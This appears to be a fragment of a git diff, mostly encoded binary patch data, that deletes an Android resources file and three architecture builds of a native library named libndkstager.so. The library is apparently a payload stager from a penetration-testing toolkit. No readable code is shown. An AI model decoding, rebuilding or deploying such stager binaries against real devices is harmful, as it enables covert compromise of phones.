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

diff --git a/data/android/apk/resources.arsc b/data/android/apk/resources.arsc
deleted file mode 100644
index 03f6c44d2873fe60ae877cb150946896a918e315..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 580
zcmds!F$=;l6oju)q(g@ejvYEUck1Bapy1%*KM<r8DT3Bgi{RuRckp|m0XKIqT<+d`
zX#*FhL|Z3CGG<zNWgC$PgC^Rm(pjxGsx{yqaM07vxGZ|}lNYwuO;;80#I({~oi6n3
zY(ZtchS|R&BL^bY0S&pXsjU~V2nJ2yluQOzkDvLBdY^PdZSPWgWgC$PgT{Q@v5ve<
j<x}S_mnvmu_ZzI9o5IkGT&dkxZ;8+0FT~>kbYk`cviKRA

diff --git a/data/android/libs/armeabi/libndkstager.so b/data/android/libs/armeabi/libndkstager.so
deleted file mode 100644
index f56cfbe78dfa29f17af241ba0bd689ff33b9d148..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 13496
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

diff --git a/data/android/libs/mips/libndkstager.so b/data/android/libs/mips/libndkstager.so
deleted file mode 100644
index e9635c6bf394fd228bffbcfb49280d1fa2a14469..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 5424
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
DXnyX>

diff --git a/data/android/libs/x86/libndkstager.so b/data/android/libs/x86/libndkstager.so
deleted file mode 100644
index 358834f3007bb6fcca8a2bd5feaf8fce15995ad7..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 5204
zcmeHLe{3699e+t~t=Wv@LB_&bm^a;qyOm2)Le-H7YSpyOu-cHO<3|VP>bt}yj%|F`
zDybs1B@NWN8AYSwuTDc+K@|cCsnb-!1eHQlA@z@d0`$)cjmgm_QKV`LTgUPFyu0VR
zE<(V6Nd3xRf8Y1#`@Z+S_ujob{`t)Aj*bqYpi6WK#SKCjeK61riiFrGlHwuJBQ`)p
zox<yA6SWYPKUfL94+ufLk6c{H_*Y{>T>W@}JK#WMT<SYPu0ekddg3~GBK7QJ^e?V;
z^?vw<n1PI_`u`&IVDADMAJQ@UxAZ@VzKJS+yCYOh_z+r1u?gfq*5rgBZva=2%y<|1
zjpCUWJ*V>vEj;bV+W13l{5RToyN#a$-yaF)mHo|t*AjtIT>Q;H-o|@vyvSyAGiG+8
zP%?{!V|K`zu02z5!8op&o66?$Q`rf#P!!MZ8_Di3Wy+>?hi>wSS+&HZ?N$nwa7vYG
zq2x}8a>Xu*stwy*vFzBP^TAS4y4#lNnuv1Pao9^0z1by86bpwP*UCNpwBeM=OoucV
zQmYs?O4bzIChaPDfyx!48yE#*dBq2T?ZCBUeX$l<FB^eeclx571j<xkD#ZtYtWUN@
zBA_de!WNF#K{q1E8>Db-kRtHgqzHC{6oGG&BEUK+0^TBJCoSM#U>5!>vLD%E_IX;Y
zUH1X6u-fueudPVFhdhOAmn7dyo_}jUm;7e(3GzRbJe&C>`9;a=<on5=kUUlS9po$E
z4>W#+=E<dBZ4#nx>5cmQR`4}VZ+shCNO}(~LC^$9ZhC1wzHrIy^jE+|m+G%kTYvo%
zBnKJ?@qcoubZ5M@9)VY)me#fUeDMw6XAh#;L;dJ&|A(Z%5%{k+-uj13BXVeIF$8b3
zemkXuUwZC9<If0ma_PNCki|Lu+%4btF5u6vXY^t3lwQG-c^|2r(KBqsuOJr<dr~c<
zYskVM>s`3iy>JWb+jyCMx%$olABjfm^KQfUVXkRd?Ao9XVWi=~hB6KoGRZGos$K40
zs3F91dU&U(&o98S<|4%FdYZm)Y{nVZ8+#B#s^?##A++^Z^}TR!8X@rGFv6S-dvTb`
zOkX?;liG49oNE!*y`Khw^iUa&O?uS5-v-L$oyxJ^y7y+FNwjOcaecV%y+iF~uhYAD
znxoBNKwf+evL3xwME4mz;xC?}id<3O%Aqh+4fFaZ57S?}T%R9@hxed&tO6}2^-%^0
z>=LyoCsp%bWDxYJ!-qu@1S#sh7<vydUK`h=YQdU;&j*2jA(NA_pZqtmlQKyaoAG3l
za-jY6yMlq9ALJCvf$pXZ1LZu+f&PXoiA9wX6$df?ASW+_<l`#EvFD|%xpE=z>PgsW
zIv3OrWf<^XewfL?4%4daq#tqtf05<u{gNf_y%1FO!_WNg$SxHB^C<B{U(bGR36&J-
z3KC}RG;Y3!(QM^xCmQQ$W3m$qzwaJ-cWvZ--=A2#h+zI(KWWS%D%PS2e9{){?vo;X
z%70A_9@oA~wVdmF!s^RSTg5`j7Jb~?gTE)7zR}G7RN62rQ*CmQD^DBKwre_-V!7ZN
zayvIh%~^RsSZ48PVXDuWbzFP8FKy54Dw>YNqsOj_Z<<HVzM@&0?2}TF+>&V%1%^XB
zlv*8!3#EelS-~Dc&lbl6E)K5Ap)Jn|c_59HMol-5Atvv(`7b3cDKPxMj(OJ@hG54X
